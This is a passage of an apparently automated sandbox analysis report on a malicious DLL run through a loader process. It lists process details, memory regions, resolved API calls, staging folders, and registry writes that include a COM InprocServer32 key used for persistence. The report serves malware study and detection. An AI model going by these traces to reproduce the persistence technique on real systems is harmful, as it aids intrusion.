| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:25 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 95472 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #25: gorctexxzx.exe
129
0
| Information | Value |
|---|---|
| ID | #25 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=InstallW /fn_args="1" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:32, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:57 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb7c |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
B80
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x000d0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000110000 | 0x00110000 | 0x0020ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x0030ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000310000 | 0x00310000 | 0x003d7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000003e0000 | 0x003e0000 | 0x004e0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000004f0000 | 0x004f0000 | 0x010effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000010f0000 | 0x010f0000 | 0x0118ffff | Private Memory | Readable, Writable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000001200000 | 0x01200000 | 0x0132ffff | Private Memory | Readable, Writable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Registry (10)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\Software\Classes\CLSID\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\InprocServer32 | - |
|
1 | |
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | - |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Classes\CLSID\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\InprocServer32 | data = 1, size = 4, type = REG_SZ |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = HtParam, data = 3600, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = StVal, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = IPlace, size = 2, type = REG_BINARY |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Plgv, size = 88, type = REG_BINARY |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Plpv, size = 92, type = REG_BINARY |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = ISFValue, size = 0, type = REG_BINARY |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = ISRValue, size = 0, type = REG_BINARY |
|
1 |
Module (101)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
12 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (6)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:25 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 95535 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 | |
| Get Info | type = Operating System |
|
1 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #26: gorctexxzx.exe
118
0
| Information | Value |
|---|---|
| ID | #26 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=AddAtomS /fn_args="Install" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:32, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:57 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb88 |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
B8C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x000fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000150000 | 0x00150000 | 0x0024ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000002f0000 | 0x002f0000 | 0x003effff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000490000 | 0x00490000 | 0x0049ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000004a0000 | 0x004a0000 | 0x00567fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000570000 | 0x00570000 | 0x00670fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000680000 | 0x00680000 | 0x0087ffff | Private Memory | Readable, Writable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000001200000 | 0x01200000 | 0x01dfffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Module (101)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
12 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
